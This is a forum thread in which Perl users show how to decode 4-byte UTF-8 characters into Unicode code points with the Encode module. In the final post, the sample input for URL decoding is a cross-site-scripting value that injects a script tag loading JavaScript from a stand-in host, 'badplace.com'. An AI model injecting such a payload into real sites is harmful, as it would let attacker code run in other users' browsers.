converting UTF-8 to unicode hex with perl

F

FangQ

I need to convert a utf-8 encoded character to it's corresponding
unicode value. Because these characters is located between
0x20000~0x2FFFF, therefore, my old approach, i.e. using Text::Iconv
(from UTF-8 to UCS-2) does not work anymore. Any better approach?
(converting to its surrogate pairs is also fine)

as an example, the URL encoded UTF-8 character (4 byte) is "%F0%A1%BF
%AA", and I want the output to be 0x21FEA.

thanks in advance!
 
P

Peter J. Holzer

I need to convert a utf-8 encoded character to it's corresponding
unicode value.

Use the "decode" function.
Because these characters is located between
0x20000~0x2FFFF, therefore, my old approach, i.e. using Text::Iconv
(from UTF-8 to UCS-2) does not work anymore. Any better approach?
(converting to its surrogate pairs is also fine)

my $characters = decode('UTF-8', $bytes);

for (split(//, $characters)) {
printf("%#x\n", ord);
}

hp
 
S

sln

I need to convert a utf-8 encoded character to it's corresponding
unicode value. Because these characters is located between
0x20000~0x2FFFF, therefore, my old approach, i.e. using Text::Iconv
(from UTF-8 to UCS-2) does not work anymore. Any better approach?
(converting to its surrogate pairs is also fine)

as an example, the URL encoded UTF-8 character (4 byte) is "%F0%A1%BF
%AA", and I want the output to be 0x21FEA.

thanks in advance!

Something like below should help.

-sln

------------------------
use strict;
use warnings;
use Encode;
binmode STDOUT, ':utf8';

print "\n";

my $tmp = "\x{21fea}";

my $octets = encode ("utf8", $tmp);
print "Encoded string:\n";
print " length = ".length($octets)."\n";
print " octets = $octets\n";
print " URL val = ";
for (split //, $octets) {
printf ("%%%X", ord($_));
}
print "\n\n";

my $string = decode ("utf8", $octets);
print "Decoded string:\n";
print " length = ".length($string)."\n";
print " string = $string\n";
print " HEX val = ";
for (split //, $string) {
printf ("0x%X", ord($_));
}
print "\n";

__END__

Output:

Encoded string:
length = 4
octets = +¦-í-+-¬
URL val = %F0%A1%BF%AA

Decoded string:
length = 1
string = =í+¬
HEX val = 0x21FEA
 
F

FangQ

thank you both for the quick response. I followed your examples and
get the conversion working.


Qianqian
 
S

sln

thank you both for the quick response. I followed your examples and
get the conversion working.


Qianqian

One last question. If you can't decode the URL with that module
(because of 4-byte embeded utf8), what are you using?

-sln
-----------------------------------
use strict;
use warnings;
use Encode;
binmode STDOUT, ':utf8';

my $urlchrs = qr/[^\w.!~*'()]/; #URL unreserved chars (just a guess)

my $url_encoded_sample = 'http://target/getdata.php?data=<script src="http://
www.badplace.com%2fnasty%F0%A1%BF%AA.js%22%3e%3c%2fscript%3e';
# 4byte, UTF-8 ^^^^^^^^^^^^

# test prints of URL encoded sample ...
print "\nSample:\n$url_encoded_sample\n",'-'x20,"\n";
print "\n", decodeURL( $url_encoded_sample ),"\n";
print "\n", encodeURL( decodeURL( $url_encoded_sample ) ),"\n";
print "\n", decodeURL( encodeURL( decodeURL( $url_encoded_sample ) ) ),"\n\n";

# decoded UTF-8. values > 255 are shown as dynamic generated hex string (useless) ...
for (split //, decode ('UTF-8', decodeURL( $url_encoded_sample ) )) {
my $uchar = ord;
if ($uchar >= 255) {
printf ("\\x{%X}", $uchar);
} else {
print;
}
}
print "\n";
exit 0;

# subs ...
sub decodeURL {
my $bytes = shift;
$bytes =~ s/%([0-9a-fA-F]{2})/ pack ("C", hex($1)) /ge; # octets 'C'
return $bytes;
}
sub encodeURL {
my $text = shift;
$text =~ s/($urlchrs)/ sprintf ("%%%02X", ord($1)) /ge;
return $text;
}

__END__

Output:

Sample:
http://target/getdata.php?data=<script src="http://
www.badplace.com%2fnasty%F0%A1%BF%AA.js%22%3e%3c%2fscript%3e
--------------------

http://target/getdata.php?data=<script src="http://
www.badplace.com/nasty+¦-í-+-¬.js"></script>

http%3A%2F%2Ftarget%2Fgetdata.php%3Fdata%3D%3Cscript%20src%3D%22http%3A%2F%2F%0A
www.badplace.com%2Fnasty%F0%A1%BF%AA.js%22%3E%3C%2Fscript%3E

http://target/getdata.php?data=<script src="http://
www.badplace.com/nasty+¦-í-+-¬.js"></script>

http://target/getdata.php?data=<script src="http://
www.badplace.com/nasty\x{21FEA}.js"></script>
 

Ask a Question

Want to reply to this thread or ask your own question?

You'll need to choose a username for the site, which only take a couple of moments. After that, you can post your question and our members will help you out.

Ask a Question

Members online

No members online now.

Forum statistics

Threads
473,755
Messages
2,569,537
Members
45,021
Latest member
AkilahJaim

Latest Threads

Top